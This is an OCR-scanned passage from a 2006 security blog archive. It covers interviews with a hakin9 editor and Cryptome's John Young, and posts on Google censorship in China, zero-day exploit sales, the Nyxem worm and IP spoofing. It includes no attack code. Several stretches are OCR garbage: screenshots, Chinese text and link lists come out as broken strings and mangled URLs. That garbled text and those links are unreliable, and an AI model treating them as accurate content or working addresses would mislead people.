that, of course) is not very different from any other country. We do 

have a very strong group of open source ideologists (some might call 
them the followers of Richard Stallman :)), we do have some anti-patent 
people (I'd recommend http://7thguard.net for those who understand 
Polish). But we do not have any spectacular successes with any real 
inventions or discoveries (mind 


that for now I’m talking about the 
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community, not the corporations). I’d only mention two phenomena your 
readers might have heard of. One is the LSD, [Last Stage of Delirium] an 
independent research group known for pointing out bugs in Microsoft RPC 
some years ago. The other well known is [20]Michal "Icamtuf" Zalewski, 
an author of a powerful passive network scanner called "pOf" and a set 
of very useful debugging/binary analysis called "fenris". The reason for 
this unimpressive situation is the fact that Poland was cut off from 

the capitalist world for nearly 50 years [and ENIAC was introduced in 
1947], so we were isolated from real computing during that time. We just 
have to make these 50 years in the next few years. On the other hand, 
IT specialists from Poland - say, programmers - are considered very 
ingenious and good workers. For offshore corporations they are really 
attractive. 


Astalavista : During 2004/2005 we’ve 

seen record breaking *reported* vulnerabilities. What do you think is 
the primary reason, increasing Internet population, programmers’ 
deepening their security knowledge, companies in a hurry to integrate 
more features with a trade-off in security or perhaps something else? 


Roman 

: All of them. The increasing number of Internet users does not 

directly influence the number of vulns found, though. The new Internauts 
are mainly people who have never used computers and networks before. Of 
course the other thing is that Internet "aggregates" huge amounts of 
data, which was publicly unavailable before. There are more and more 
programmers and IT security specialists. Their population is constantly 
growing, be it because of the money they can earn or just the popularity 
of Computer Sciences. To be honest, most of them are at most average at 
their job, but for example people from India an China have great 
potential. 


But you are right. Marketing and pressure for higher sales 

make companies work in a great hurry, they just don’t care about 
average Joe Sixpack. And Joe Sixpack would hardly ever notice any 
security vulnerabilities, not mentioning they would probably never 

report such flaws. Finding bugs in software has also become some kind of 
a fashion these days. It’s an intellectual challenge, similar to 

solving riddles. No wonder that along with the increasing number of 
people able to understand, say, the C code, the number of vulns reported 
increases. There is one more thing I'd like to mention. | suppose that 

the scale of reported vulns would appear far greater if proprietary 
software creators informed about all flaws found in their products. It’s 
not in 


their interest of course. 
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Astalavista 

: Thought or at least positioned to be secure, MAC’s and Firefox 
browsers have started putting a lot of efforts to patch the numerous 
vulnerabilities that keep on getting reported. Is it the design of the 
software itself or the successful mass patching and early response 
procedures that matters most in these cases? 


Roman 

: | have great respect for Apple products, though the only Mac | use is 
a very old Performa :), just for experiments with BSD distributions. | 
consider Macs secure in general. | also use Mozilla Firefox daily. I’d 

bet on the latter case, but like | said I’m no programming guru. The 
developers try to act fast and release patches as soon as possible, so 
at least average users can feel secure. The fact that there are plenty 
of developers makes it only better. Bugs in the code are not a nemesis 
themselves, you cannot avoid bugs in more complex applications. The only 
solution that makes sense for me is to conduct constant audits and 
release patches frequently. Look at the Microsoft Internet Explorer [I 
am aware this example is a 


bit trivial]. | have a feeling that this 

company’s ways of dealing with flaws is just childish, reminds me of 
covering your own eyes and hoping it will make yourself invisible to 
other kids on the playground. I’m not criticizing Microsoft at all - 

it’s just that the company with so many great specialists has problems 
with securing their code, and their software is the most popular 
solution in the world, no doubt. Apple is competing with Windows in 
general and Firefox tries to bite a part of the browser market. Looking 
at their financial and market share results makes me sure that the way 
the patches are done by these enterprises are the only right solution. 
Repeating that your product is secure and just better does not make it 
secure and better. 


Astalavista : In may, a DNS glitch at Google forwarded its traffic to [21]www.google.com.net 
(GoSearchGo.com) for 15 minutes. What are your comments about this 
event when it comes to security and mass DNS hijacking attempts on a 
large scale? Do you also picture a P3P enabled Google used on a large 
scale in the near future and do you fear that Google might be the next 


data aggregator (they are to a certain extent) breached into? 
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Roman 

: The real point is - DJB mentioned that in an interview for the next 

issue of ‘hakin9’ - that some of the protocols we use, especially SMTP 
and DNS, are outdated. To be precise, they were outdated at the moment 
they were being created. It’s nobody’s fault. We have a saying in Poland 
that "Nobody is a prophet in his own country". Even Bill Gates didn’t 
notice the potential of the Internet. | would say Google has really 

nothing to do with any DNS forgery. The protocol is flawful. What’s 
worse, we can live without the problematic SMTP. Without DNS, which is a 
core of the Internet. For example, | just cannot imagine my mother 

using IP addresses to surf the WWW. I’m not afraid of threats to Google 
security. They have technology, they have money, they have ideas. | 
might say that it’s Google, which will start and force security 
improvements in domain resolving mechanism. Daniel J. Bernstein claims 
that the first thing we should do is to implement some method of 
authentication in DNS protocol. Be it PKI, be it anything else - we 

have to do it so that we would have some time to introduce a really 
secure DNS replacement. As for the hijacking itself, | consider it one 

of the most primitive kinds of abusing IT infrastructure. It’s just like 
taking over somebody’s house. It’s as bad as deleting someone's data 
for sports or DDoS attacks used for fun and/or profit. 


Astalavista 

: Anonymous P2P networks have been getting a lot of popularity recently 
namely because of RIAA’s lawsuits on a mass scale. How thin do you 
think is the line between using P2P networks to circumvent censorship in 
Orwellian parts of the world, and the distribution of copyrighted 
materials? 


Roman: ‘hakin9’ team likes P2P 

networks, the more anonymous, the better. We use them for distributing 
our free articles and our CD. It makes me laugh when **AAs send e-mails 
with legal threats based on the American legal system to Polish or 
Swedish citizens. Sometimes they’re like an old blind man in the fog. 
Instead of adopting P2P for selling their video or music, they make the 
community angry. Digressions aside. | don’t feel that P2P networks will 
help anyone make their transfers safe [security through obscurity, 
right?] and that they will help to fight censorship in countries like 

North Korea or even China. On the other side, | can imagine modifying 
XMPP [Jabber] protocol to transfer SSL-secured data - it may be already 
done, | had no time to investigate it further. Unauthorized 

distribution of copyrighted content, however, will always be a problem. 
There’s no way to prevent such behaviour. Recent events show us that 
writing a P2P client is a piece of cake, even a clever 9 years old boy 

can do this. | would rather make it easier for people to buy electronic 
copyrighted materials without the need to download it illegally. 
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Regarding that according to some statistics even 30 per cent of total 
internet transfers are generated by P2P networks, I’m rather afraid that 
some stupid people downloading prOn or Britney Spears MP3s could easily 
kill the Net some day. To sum up, each technology has its profits and 
costs. Obvious :). The profit of P2P is the ease of distributing any 

content. The cost is the people using it in an illegal manner. | can see 

no reason for prohibiting these network just because some people prefer 
bad quality motion pictures to going to the movies. Should we prohibit 
usage of knives only because of the fact that someone tabbed the kitchen 
knife in someone s stomach? 


Astalavista : In 
conclusion, | wanted to ask you what is your opinion of the 
Astalavista.com’s web site, in particular, our security newsletter? 


Roman 

: I’m very impressed with the amount of data available for 
Astalavista’s visitors. I’m not a member though, so | cannot really make 
a detailed review. To be honest, | had some problems with recognizing 
which of your websites are free and which ones are not. But | have 
managed to do it and use it almost daily :). As for the newsletter, it’s 
one of the most informative and professional ones | have ever seen. 
Since having read Issue 16, | couldn’t stop myself from reading the 
archives. | am a subscriber and strongly advise everybody to do the 
same. As a person professionally dealing with IT security, | mean it - 
this is not an advertisement for Astalavista. This is the truth. 


Astalavista : Thanks for your time Roman! 


Interview with John Young, [22 ]http://www.cryptome.org/ 


Astalavista 

: Hi John, would you, please, introduce yourself to our readers, share 

some info on your background, and tell us something more about what are 
Cryptome.org and the Eyeball-Series.org all about? 
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John 

: Cryptome was set up in June 1996, an outgrowth of the Cypherpunks 
mail list. Its original purpose was to publish hard to get documents on 
encryption and then gradually expanded to include documents on 
inforamtion security, intelligence, national security, privacy and 
freedom of expression. Its stated purpose now is: "Cryptome welcomes 
documents for publication that are prohibited by governments worldwide, 
in particular material on freedom of expression, privacy, cryptology, 
dual-use technologies, national security, intelligence, and secret 
governance - open, secret and classified documents - but not limited 

to those. Documents are removed from this site only by order served 
directly by a US court having jurisdiction. No court order has ever been 
served; any order served will be published here - or elsewhere if 
gagged by order. Bluffs will be published if comical but otherwise 
ignored." The Eyeball Series was initiated in 2002 in response to the US 
government’s removal of public documents and increased classification. 
Its intent is to show what can be obtained despite this clampdown. 


Astalavista 

: What is your opinion about cyberterrorism in terms of platform for 
education, recrewting, propaganda and eventual real economic or life 
loses? 


John : Cyberterrorism is a threat 

manufactured by government and business in a futile attempt to continue 
control of information and deny it to the public. Cyber media threatens 
authorities and authoritarians so it is demonized as if an enemy of the 
state, and, not least, 


corporate profits. 


Astalavista : A couple of words - privacy, data aggregation, data mining, terrorism fears 
and our constantly digitized lifes? 


John 

: Privacy should be a right of citizens worldwide, in particular the 

right to keep government and business from gaining access to private 
information and personal data. The argument that government needs to 
violate privacy in order to assure security is a lie. The business of 
gathering private information by corporations and then selling that to 
government and other businesses is a great threat to civil liberties. 
Much of this technology was developed for intelligence and military uses 
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but has since been expanded to include civil society. 


Astalavista 

: Shouldn’t the U.S be actively working on hydrogen power or 
alternative power sources instead of increasing its presence in the 
Middle East or to put the question in another way, what is the U.S doing 
in Iraq in your opinion? What do you think is the overall attitude of 

the average American towards these ambitions? 


John 

: No question there should be energy sources as alternatives to the 
hegemonic fossil fuels. Dependence on fossil fuels is a rigged addiction 
of that worldwide cartel. Car ads are the most evil form of 

advertising, right up there with crippling disease of national security. 


Astalavista 

: Is ECHELON still functioning in your opinion and what do you believe 
is the current state of global communications interception? Who’s who 
and what are the actual capabilities? 


John : 

Echelon continues to operate, and has gotten a giant boost since 9/11. 
The original 5 national beneficiaries - US, UK, CA, AU and NZ - have 
been supplemented by partial participation of other nations through 
global treaties to share information allegedly about terrorism. 
Terrorism is a bloated threat, manufactured to justify huge funding 
increases in 


defense, law enforcement and intelligence budgest around 

the globe. Businesses which supply these agencies have thrived 
enormously, and some that were withering with the end of the Cold War 
have resurged in unprecedented profits, exceeding those of the Cold War. 


Astalavista 

: Network-centric warfare and electronic warfare are already an active 
doctrine for the U.S government. How do you picture the upcoming future, 
both at land and space and might the Wargames scenario become reality 
some day? 
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John : Network wargames are as 

pointless and wasteful as Cold War wargames were. They churn activity 
and consume expensive resources. None are reality-based, that is, 
outside the reality of imaginary warfare. 


Astalavista 

: Do you believe there’s currently too much classified or declassified 
information, namely documents, maps, satellite imagery etc. available on 
the Net these days? In the post 9/11 world, this digital transparency 

is obviously very handy for both terrorists and governments, but who do 
you think is benefiting from it? 


John : Far from 

being too much information available to the public, there is a 

diminishing amount, especially about exploitation of those who have 
access to classified and "privileged" information - government and 
business - and those who lack access. The concocted warning that open 
information aids terrorism is a canard of great legacy, one that is 
customarily spread during times of crisis, the very times when secret 
government expands and becomes less accountable. "National security" is 
the brand name of this cheat. 


Astalavista : In 
conclusion, | wanted to ask you what is your opinion of the 
Astalavista.com’s web site, in particular, our security newsletter? 


John : Great site, very informative, give yourself a prize and a vacation at G8 with the 
world class bandits. 


Astalavista : Thanks for your time John! 


John : Thanks to you! 
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. http://www. haking.pl/en/index.php?page=hakin9_live 


20. http://lcamtuf.coredump.cx/ 
21. http: //www.google.com.net/ 
22. http://www.cryptome.org/ 


2.1.36 Twisted Reality (2006-01-30 18:15) 


[1] 
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Tess Rarhuak 


| looked up the [2]definition of Evil today, and | found it, | tried to play a Google War and came 
across 256 million [3]occurrences of it, still there’s a [4]hope for all of us | guess. On the 17th 
of January | blogged on how [5]China turned into the biggest black spot on the Internet’s map, 
to find out that | even have activists commenting in my blog :) 


Google has agreed to "[6]remove certain sensitive information from our search results" you 
all know it by now, what you perhaps don’t know is how what used to be the old Google still 
has its marks on the web. [7]Google’s Information for Webmasters still states that : 


"Google 

views the comprehensiveness of our search results as an extremely 
important priority. We’re committed to providing thorough and unbiased 
search results for our users." 


Googe RHRNHRAGRHN SS FH—-MRMEB Hi. AMR RMCCESAGRARNPAP. WL 


MADRE AER REE NBO RAMMMCMRE . Sit spamming RGSS! SRR, RA RE 
LEREMMAAO SITE SH PRAM. 
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| 

guess Chinese users should print this and stick it on their walls to 

remind them of the past as it says exactly the same. They have also [9]removed 
their "censored notice" from "older removals", how come, and for what 

reason? Lack of accountability for when "local laws, regulations, or 

policies" were removing "sensitive information" before the date?! Google 

is my benchmark for disruption, but | guess its actions and "do no 

evil" motto were simply too pure for the business world, which on the 

majority of occasions is capable of destroying morale, even 

individuals.. 


Welcome in a [10]"Twisted Reality" where one event looks like an entirely different one - on 
request, and the list is getting [11]bigger! 


philipp.Jenssen@igmail.com | Search History | My Account | Sagn out 
Web Images Groups News Froogle Local more » 
guanced Image Search 
Google fiananmen square Search Srtremiore fant 
Images Moderate SafeSearch is on 


Images Showng | All image sizes =| Results 1 - 20 of about 13,400 for tiananmen square [defintion]. (0.19 seconds) 


The Tiananmen Square An icon at Tlananmen on protesters in Tlananmen Demonstrations m 
photo Square 1989 Square Tiananmen Square 

494 x 449 pixels-23k-jpg G00 « 380 pixels-102k-jpg 220 « 168 pixels - 13k - jpg 400 x 282 pixels - 71k - gif 
www rollins edu multigraphic. dk aww cnn com ween historyez. carr 


Remember Tiananmen Tiananmen Square, 15 Years Tiananmen Square, 15 Years massacre since 
Square Ager Alter Tiananmen Square 
640 x 403 pixels - 58k « jpg 450 x 360 pixels - 24k - jpg 705 « 742 pixels - 133k - jpg 440 « 300 pixels - 40k - jpg 
www. IDO. gow www lilithqailery. cory ww. lidhgallery.com cnisespictures. org 


But what is actually filtered in china these days, what are the topics of interest? Four years 
ago, a [13]great initiative 

brough more insights into what’s deemed "sensitive information", and 

while of course the list is changed on-the-fly, it is important to know 

how it blocks the top results, as this is where all the traffic goes. 


Recently, CNET did a nice [14]research on which sites are blocked by which search engine, | 
ever saw [15]Neworder in there :) 
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[16] 


AX MA AH Ba» 
Google fies: —— ssa 
HR 


A am: [maesme =| $) WORT Atiananmen squares IBS *. LCT RMA. (SA 0.06 2) 


Mi: SRR. GooleRADERRSFANMP RAR [5] 


Mrs. Gutierrez at Raising Ceremony in The Revarnped Tiananmen Tiananmen Square to 
Tiananmen Square Tiananmen Square Square celebrate 

1728 « 1152 MH - 317k - jpg 320 x 334 (BF - 21k - jpg 240 « 156 (# - 18k - jpg 200 « K2 BH - 19k - jpg 

wow usembassy-ching org. cri blogs. msdn.com english. people com.cn wew2 chinadaily com cri 


Clean of Tiananmen Square Tiananmen Square protest Full day tour to Tiananmen Tiananmen Square. China 
kicks off planners Square, has 
400 x B09 RS - 32k - jpg 400 « 225 RS - 10k - jpg 640 » 450 (RF - 160k - jpg SHO x 252 (RF - 19k - jpg 
english people com.cn weew. chinadaily com.cr www tours on www? chinadaily com cr 


The best thing about [17]China’s backbone is how centralized it really is and the way 
[18]researchers are finding [19]common censorship patters that could prove useful for future 
research. Is [20]TOR with its [21]potential applicable in China, and would initiatives such as 
the the [22]Anonymous OS, or even [23]TorPark, an USB extension of the idea, the future? 


Meanwhile, in case they are interested parties reading this post, consider taking a look at the 
"[24]Handbook for Bloggers and Cyber-Dissidents" courtesy of [25]Reporters Without Borders. 


Technorati tags : 


[26]privacy, [27]censorship, [28]search engine, [29]google, [30]china, [31]TOR, 
[32]Anonymity 


https: //web.archive.org/web/20101016193525/http: //www.sfrc.ufl.edu/Larry/twisted. jpg 


http: //www.google.com/search?hl=en&q=define/3Aevi 


http://www. google.com/search?hl=enkq=evi 


http://www. google.com/search?hl=enklr=&%q=good 


http: //ddanchev.blogspot .com/2006/01/china-biggest-black-spot-on-internets.htm 


http: //googleblog. blogspot. com/2006/01/google-in-china.htm 
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8 
9. http://www. google. com/support/bin/answer .py?answer=17795&t opic=368 

10. 

11. 


12. bttps://web.archive.org/web/20101016193525/http://blog.outer-court.com/files/google-images-censorship. jp 


13. 

14. 

15. 

16. https://web.archive.org/web/20101016193525/http://blog. outer-court.com/files/google-images-censorship-c 
17. bttp://www.cnnic.net.cn/images/2004/image/map2003q4. jpg 

18. : ; .org/ 
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. http: //theory.kaos.to/projects.htm 
23. http: //waw. freehaven.net/~arrakis/torpark.html| 


. http://www. freehaven.net/~arrakis/torpark.htm 
. http://www.rsf.org/IMG/pdf/handbook_bloggers_cyberdissidents-GB. pdf ?PHPSESSID=5f 53e6cb837bd734cc0c945eaf 
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2.1.37 How we all get Own3d by Nature at the bottom line? (2006-01-30 18:17) 


[1] * | just came across a clip courtesy of [2]NASA that can be described as a [3]beautiful 
devastation, 

still it reminds me of how insecure we are at the bottom line. And no, | 

don’t see how you will distribute a signature for this, or can you? :) 


Technorati tags : 


[4]katrina, [5]security 


204 


1. fitapa;//eeb archive. org/web/20101016199525/h0%p:/ photos! blogger. cox/blogger/1959/1770/1600/eatrina burr’ 
2. hetp://aww nasa. gov/ 

3, heap: //www nase, gov/aev/i15027uaia, katrina, GOES 04 

4. http:/ /technoreti con/tag/katrina 
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2.1.38 Was the WMF vulnerability purchased for $4000?! (2006-01-30 18:18) 


[1] * Going through Kaspersky’s latest summary of [2]Malware - Evolution, October - Decem- 
ber 2005, | came across a research finding that would definitely go under the news radar, as 
always, and while [3]The Hackers 

seem to be more elite than the folks that actually found the 

vulnerability | think the issue itself deserves more attention related 

to the future development of a [4]market for Oday vulnerabilities. 


Concerning the [5]WMF vulnerability, it states : 


"It 

seems most likely that the vulnerability was detected by an unnamed 
person around 1st December 2005, give or take a few days. It took a few 
days for the exploit enabling random code to be executed on the victim 
machine to be developed. Around the middle of December, this exploit 
could be bought from a number of specialized sites. It seems that two or 
three competing hacker groups from Russian were selling this exploit 
for $4,000. Interestingly, the groups don’t seem to have understood the 
exact nature of the vulnerability. One of the purchasers of the exploit 

is involved in the criminal adware/ spyware business, and it seems 

likely that this was how the exploit became public." 


Two months ago, | had a [6]chat with [7]David Endler, director of Security Research at 
[8]TippingPoint, and their [9]ZeroDaylnitiative, that is an alternative to [10]iDefense’s efforts 
to provide money as a incentive for quality vulnerabilities submissions. The fact that a week 
or so later, the [11 ]first vulnerability appeared on Ebay felt "good" mainly because what | was 
[12]long envisioning 

actually happened - motivated by the already offered financial rewards, 

a researcher decided to get higher publicity, thus better bids. | never 

stopped thinking on who gains, or who should actually gain, the vendor, 

the end user, the Internet as a whole, or I’m just being a moralist in 
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here as always? 


This very whole concept seemed flawed from the 

very beginning to me, and while you wish you could permanently employ 
every great researcher you ever came across to, on demand HR and where 
necessary seems to work just fine. But starting with money as an 
incentive is a moral game where "better propositions" under different 
situations could also be taken into consideration. Researchers will 
always have what to report, and once ego, reputation and publicity are 
by default, it comes to the bottom line - the hard cash, not "who'll pay 
more for my research?", but "who values my research most of everyone 
else?". And when it comes to money, | feel it’s quite common sense to 
conclude that the underground, have plenty of it. | am not saying that a 
respected researcher will sell his/[13]her 

research to a illegal party, but the a company’s most serious 

competitors are not its current, but the emerging ones, | feel quite a 

lot of not so publicly known folks have a lot to contribute.. 


Possible scenarios on future vulnerability purchasing trends might be : 


what if vendors start offering rewards ( $ at the bottom line) for 
responsibly reported vulnerabilities to eliminate the need of 
intermediaries at all, and are the current intermediaries doing an 
important role of centralizing such purchases? | think the Full 

Disclosure movement, both conscious or subconscious :) is rather active, 
and would continue to be. Now, what if Microsoft breaks the rules and 
opens up its deep pocketed coat? 


- how is the Oday status of a 

purchased vulnerability measured today? My point is, what if the WMF 
vulnerability was used to "nail down" targeted corporate customers, or 
even the British government as it actually [14]happened 

, and this went totally unnoticed due to the lack of mass outbreaks, 

but the author sort of cashed twice, by selling the though to be Oday to 
iDefense, or ZeroDay’s Initiative? What if? 


- requested 
vulnerabilities are the worst case scenario | could think of at the 
moment. Why bother and always get excited about an IE vulnerability, 
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when you know person/company X are running Y AV scanner, use X1 browser 
as a security through obscurity measure. That’s sort of reverse model 
compared to current one where researchers "push" their findings, what if 

it turns into a "pull" approach, "I am interested in purchasing 

vulnerabilities affecting that version of that software", would this 

become common, and how realistic is it at the bottom line? 


Some 

buddies often ask me, why do | always brainstorm on the worst case 

scenario? | don’t actually, but try to brainstorm on the key factors and 

how the current situation would inevitably influence the future. And 

while I’m not Forrester Research, | don’t charge hefty sums for 10 pages 

report on the [15]threats posed by two-factor authentication or e-banking, do I? Still, I’m right 
on quite some occasions.. 


At 

the bottom line, ensure $ isn’t the only incentive a researcher is 
getting, and don’t treat them like they are all the same, because they 
aren’t, instead sense what matters mostly to the individual and go 
beyond the financial incentive, or you'll lose in the long term. 


What 

are you thoughts on purchasing vulnerabilities as far as the long term 

is concerned? What is the most effective compared to the current 
approaches way of dealing with Oday vulnerabilities? Might a researcher 
sell his findings to the underground given he knows where to do it? What 
do you think? 


UPDATE : "[16]Where’s my Oday, please?" 
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2.1.39 January’s Security Streams (2006-01-31 18:19) 


[1] * It’s 

been quite a busy month, still |'ve managed to keep my blog up to date 
with over 30 posts during January, here they are with short summaries. 
Thanks for the comments folks! 


| often get the question, how many 
people is my blog attracting, the answer is quantity doesn’t matter, 
but the quality of the visits, still, for January there were 7,562 
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unique visits and over 13,000 pageloads. I’m already counting over 400 

.mil sub domains, have the majority of security/AV vendors(hi!) reading 

it, and the best is how long they spend on average, and how often they 

come back. To sum up, 60 % of all visits come from direct bookmark of my 

blog, 30 % through referers, and 10 % from search engines. It is also 

worth mentioning my [2]last referring link, notice the domain and what they are interested in. 


1. [3]What’s the potential of the IM security market? Symantec thinks big" gives a brief 
overview of the wise acquisition Symantec did and a little something the IM security market. 


2. "[4]Keep your friends close, your intelligence buddies closer!" mentioning the release of a 
book excerpt and provides further resources on various NSA and intelligence related topics 


3. "[5]Security quotes : a FSB (Successor to the KGB) analyst on Google Earth" is Google 
Earth or satellite imagery a national security threat? At least the Russian FSB thinks so! 


4. "[6]How to secure the Internet" discusses the U.S National Strategy to Secure Cyberspace 
and some thoughts on the topic 


5. "[7]Malware - Future Trends" the original announcement for the release of my research 


6. "[8]Watch out your Wallets!" gives more info on ID theft and talks about a case that left a 
22 years old student in debt of $412,000 


7. "[9]Would we ever witness the end of plain text communications?" 

a released report on the growth of VPNs prompted me to open up the 
topic, recently, Yahoo! communicate over SSL by default which is a great 
progress from my point of view 


8. "[10]Why we cannot measure the real cost of cybercrime?" 

an in-depth summary of my thoughts on why we cannot measure the real 
cost of cybercrime, and why | doubt the costs outpace those due to drug 
smuggling 
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9. "[11]The never-ending "cookie debate" 

tries to emphasize on how the Cookie Monster should worry about cookies 
only, and what else to keep in mind concerning further techniques that 
somehow invade your privacy 


10. "[12]The hidden internet economy" 
here | argue on what would the total E-commerce revenues be given those 
afraid to purchase over the Internet actually start doing it. 


11. "[13]Security threats to consider when doing E-Banking" provides a link to practical 
research conducted by a [14]dude | happen to know :) 


12. "[15]Insecure Irony" 
is indeed an ironical event, namely how a private enterprise, one used 
to gather intelligence actually lost sensitive info belonging to the [16]Intelligence Community 


13. "[17]Future Trends of Malware" the post mentioning my Slashdotted research and the rest 
of the people and respected sites that recognized it 


14. "[18]To report, or not to report?" 

how can you measure costs when the majority of companies aren’t even 
reporting the breaches, cannot define a breach, or think certain 
breaches don’t require law enforcement intervention? 


15. "[19]Anonymity or Privacy on the Internet?" 
argues on what exactly different individuals are trying to achieve, is 
it Anonymity, is it Privacy and provides further resources on the topic 


16. "[20]What are botnet herds up to?" 

gives a brief overview of recent botnet herds’ activities the ways used 
to increase the revenues through affiliate networks, or domaining. It 
also provides good resources on the topic of Bots and Botnets 
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17. "[21]China - the biggest black spot on the Internet’s map" a very recent and resourceful 
overview of Internet Censorship in China, that also provides further resources on the topic 


18. "[22]FBl’s 2005 Computer Crime Survey - what’s to consider?" one day after the release 
of the FBI’s survey | summarized the key points to keep in mind 


19, "[23]Why relying on virus signatures simply doesn’t work anymore?" 
a very practical post that argues and tries to build more awareness on 
how the number of signatures detected by a vendor doesn’t actually 
matter, still there are other solutions that will get more attention 

with the time. | received a lot of feedback on this, both vendors and 
from folks | met through my blog, thanks for the ideas!! 


20. "[24]2006 = 1984?" 
gives more details on private sector companies innovating in the wrong 
field, and further resources on censorship and surveillance practices 


21. "[25]Cyberterrorism - recent developments” an extended overview of [26]Cyberterrorism, 
and a lot of facts worth mentioning obtained through a recently released report on the topic 


22. "[27]Still worry about your search history and BigBrother?" Some humor, be it even a 
black one is always useful 


23. "[28]Homebrew Hacking, bring your Nintendo DS!" Homebrew hacking is slowly emerging 
and | see a lot of potential in the "do it yourself culture" 


24. "[29]Visualization, Intelligence and the Starlight project" a post worth checkin’ out, it 
provides an overview of various visualization technologies and talks about the Starlight 
project 


25. "[30]The Feds, Google, MSN’s reaction, and how you got "bigbrothered"?" 
I’m not coining new terms here, "bigbrothered" is slowly starting to be 
used be pretty much everyone, yet | try to give practical tips on why 
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the whole idea was wrong from the very beginning, and how other 
distribution vectors should also be considered 


26. "[31]Personal Data Security Breaches - 2000/2005" 

| came across a great report summarizing the issue, and tried to 
highlight the cases worth mentioning, some are funny, others are 
unacceptable 


27. "[32]Skype to control botnets?!" good someone is brainstoring, but that’s rather 
unpractical compared to common sense approaches botnet herders currently use 


28. "[33]Security Interviews 2004/2005 - Part 1" Grab a beer and start going through this 
great contribution, soon to appear at Astalavista itself! 


29. "[34]Security Interviews 2004/2005 - Part 2" Part 2 


30. "[35]Security Interviews 2004/2005 - Part 3" and Part 3 


31. "[36]Twisted Reality" Everything is not always as it seems, and it’s Google | have in mind 


32. "[37]How we all get Own3d by Nature at the bottom line?" :) 


33. "[38]Was the WMF vulnerability purchased/sold for $4000?!" 

among the few vendors | actually trust released a nice summary no one 
seems to be taking into consideration, still | find it truly realistic 

given the potential of the [39]Oday market for software vulnerabilities 


Till next month, and thanks to all readers for taking their time to go through my research and 
contributions! 
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2.2 February 


2.2.1 Suri Pluma - a satellite image processing tool and visualizer (2006-02-02 15:28) 


| just came across a great [1]satellite image processing software and decided to share it 
with my blog readers. Perhaps that’s a good moment to spread the word about my [2]RSS 
compatible feed, so consider syndicating it. To Sum up : 


"Suri 

Pluma is a Satellite image processing tool and visualizer. It can open 

the most common image formats without importing to an internal format 
and minimizing the memory required for visualization. It is designed to 
be modular and extensible. It has a meassurement tool (distance and 
areas with error estimation) and geographical and map coordinate 
information." 


Check out the [3]screenshots and consider [4]downloading it in case you’re interested. 
Meanwhile, you can also go through a previous post that’s again related to [5]visualization. 


Technorati tags : 
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2.2.2 CME - 24 aka Nyxem, and who’s infected? (2006-02-02 15:32) 
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Nyxem.E (Blackworm) global view 


Today, the [2]F-Secure’s team 

released a neat world map with the Nyxem.E infections. As you can see 

the U.S and Europe have been most successfully targeted, but | wonder 

would it be the same given the author started [3]localizing the subject/body [4]messages 
found within the worm to other languages? Who seeks to cause damage 

instead of controlling information and network assets these days? A 

pissed off commodities trader? :) or on request, as the [5]original version of the worm 
"can perform a Denial of Service (DoS) attack on the New York 

Mercantile Exchange website (www.nymex.com)", still that’s 2 years ago. 


Tomorrow 

is the day when the worm should originally start deleting all all 

.doc, *.xls, *.mdb, *.mde, *.ppt, *.pps, *.zip, *.rar, *.pdf, *.psd and 

.dmp on an infected PC’s, [6]supposedly network drives as well, 

what | also expect is more devastation on the 3rd of March given the 

same happens every month. And while | doubt there’s still someone out 

there unaware of this, perhaps, released under "revenge mode" malware, 

check out [7]Internet Storm Center’s summary, and [8]know know your enemy, hopefully not 
until next month again! UPDATE : You can actually go through another post in order to update 
yourself with some [9]recent malware developments. 
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2.2.3 What search engines know, or may find out about us? (2006-02-03 15:33) 


Today, CNET’s staff did an outstanding job of finding out [1]what major search companies 
retain about their users. AOL, Google, Microsoft and Yahoo! respond on very well researched 
questions! 


Whatever 

you do, just don’t sacrifice innovation and trust in the current 
services for misjudged requests at the first place from my point of 
view. 


At the bottom line, differentiate your [2]Private Searches Versus Personally Identifiable 
Searches, consider visiting [3]Root.net, [4Jand [5]control your [6]Clickstream. You can also go 
through [7]Eric Goldman’s comments on the [8]issue and his [9]open letter regarding Search 
Engines and China. 


As a matter of fact, | have just came across a very [10]disturbing fact that | compare with 
initiatives to [11]mine blogs for [12]marketing research, [13]EPIC 

has the details on its front page. It was about time a private entity 

comes up with the idea given the potential and usability of the idea. 

Could such a concept spot, or actually seek for cyber dissidents in 
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restrictive regimes with the idea to [14]actually reach them, besides mining for extremists’ 
data? | really hope so! 


Technorati tags: 
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2.2.4 The current state of IP spoofing (2006-02-06 10:01) 


A week ago, | came across a great and distributed initiative to map the distribution of spoofable 
clients and networks - the [1]JANA Spoofer Project, 
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whose modest sample of 1100 clients, 500 networks and 450 ASes can 

still be used to make informed judgements on the overall state of [2]IP Spoofing. | once posted 
some thoughts on "[3]How to secure the Internet" 

where | was basically trying to emphasize on the fact that securing 

critical infrastructure by evaluating how hardened to attacks it really 

is, can be greatly improved as a concept. What if that infrastructure is 

secured, but the majority of Internet communications remain in 

plain-text, and are easily spoofable, which | find as one of the biggest 

current weaknesses. If you can spoof there’s no accountability, and you 

can even get DDoSed by [4]gary7.nsa.gov, isn’t it? (in the original [5]Star Trek series, 
Gary Seven was the covert operative who returned from the future to fix 

sabotage to the United States’ first manned rocket to the moon moments 

before lift off). 


On the other hand, according to Gartner [6]IPSec will be dead by 2008, 
but | feel this is where its peak and maturity would actually be 
reached. IPv4 will evolve to IPv6, therefore IPSec will hopefully be an 
inseparable of the Internet. 


So what’s the bottom line so far? 


- 366 million spoofable IP addresses out of 1.78 billion 
- 43,430 spoofable netblocks 
- 4700 spoofable ASes out of 18450 


- [7]NAT’s and [8]XP SP2’s make their impact 


The 

higher the population the scarier the numbers for sure! | have always 
believed in distributed computing and the power of the collective 
intelligence of thousands of people out there. Be it integrating 

powerful features whose results are freely available to the public 

through OEM agreements or whatsoever, | feel in the future more vendors 
will start taking advantage of their customers’ base for 
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How you can contribute? [9]Pick up your client, 

start spoofing, but make sure your actions don’t raise someone’s 
eyebrows, even though you simply wanted to contribute, that’s just a 
couple of packets to a university’s server that’s looking forward to 
receiving them this time :) 


[10]Dshield.org - the Distributed Intrusion Detection System is a very handy and useful 
[11LJOSINT tool that is obviously [12]being used by the NSA as well (check out the Internet 
Storm Center’s [13]post on this, and the [14]photo itself) UPDATE : Cryptome also featured 
fancy pictures from the [15]NSA’s Threat Operations Wizardy. 


What 

is your opinion on the current state of IP Spoofing on the web and the 
fact how handy this insecurity comes to DDoS attacks? What should be 
done from your point of view to tackle the problem on a large scale? 


You can also consider going through many other distributed concepts : 


[16]The original DES Cracker Project 


[17]DJohn - Distributed John 
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[18]Bob the Butcher distributed password cracker 
[19]Seti at Home 

[20]ForNet : A Distributed Forensics Network 
[21]Pandora - Distributed Multirole Monitoring System 
[22]FLoP - distributed Snort sensor 

